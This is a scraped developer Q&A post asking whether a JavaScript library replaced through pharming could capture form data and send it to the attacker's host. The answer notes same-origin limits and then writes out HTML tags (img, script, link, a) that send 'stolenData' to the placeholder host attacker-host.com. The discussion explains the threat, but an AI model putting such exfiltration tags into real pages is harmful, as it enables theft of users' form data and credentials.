开发者

An emulated jQuery or MooTools library (in ex.by pharming) can capture and send data to an external site?

问答 作者:

There is a new fashion in calling jQuery, YUI, MooTools frameworks (and a lot of plugins too) from an external base site in order to be working with the latest builds.

In a pharming attack (just to mention one) the original library can be replaced by one infected in order to use it to manipulate the behavior of the library, the browser or the plug-ins. It's easy to capture form data, querystrings and other info using those libraries. It's e开发者_开发百科asy to send it too.

So my question is:

Can the attacker also send this captured data to the same pharming emulated host from which has obtained the fake library?

There's a cross site JavaScript policy in the browser but is valid in this case? Remember that the fake library would be loaded from the same emulated host, and would also from the infected page, so there's no call to cross site DOM objects or functions.

Thanks a lot!

well, you should think about the ways javascript can transmit data to another site :
-ajax
-frames
-attaching external URL to dom objects
-webSockets

In the first two cases, although there are some hacks, because of the same origin policy, it is not possible to transmit data from a site to another hosted on a different (sub)domain or another using a different protocol.Even if the host is "poisoned" by "pharming", it doesn't mean that it will point to the same domain.
It is very easy to simply acces an external URL and send any GET data to it, simply by attaching that URL to a dom element that requires one : 

<a href="http://attacker-host.com/?stolenData=stolenData"></a>
<img src="http://attacker-host.com/?stolenData=stolenData" />
<script src="http://attacker-host.com/?stolenData=stolenData"></script>
<link href="http://attacker-host.com/?stolenData=stolenData" />
//... and so on
If the attacker implements a webSocket data transmitter and if you use a modern browser, the data exchange might work.

In conclusion, it can be done, although it would a bit unlikely to sabotage a DNS and to modify js libs in a way that the user could not tell.

EDIT: added the simplest solution : dom objects

继续阅读:javascriptjquerymootoolssecurity

更多精彩内容

0

上一篇:

下一篇:

精彩评论

暂无评论...
登录 注册
Qedev.com
验证码 换一张
取 消

最新问答

问答排行榜

法律声明:本站内容均为网友上传,网站举办方负责审核和监督,

如存在版权或非法内容,欢迎举报,我们将尽快予以删除。

Copyright © 2018-2020 开发者. All rights reserved.

Powered by 开发者

ICP备案号: 京ICP备10032868号-9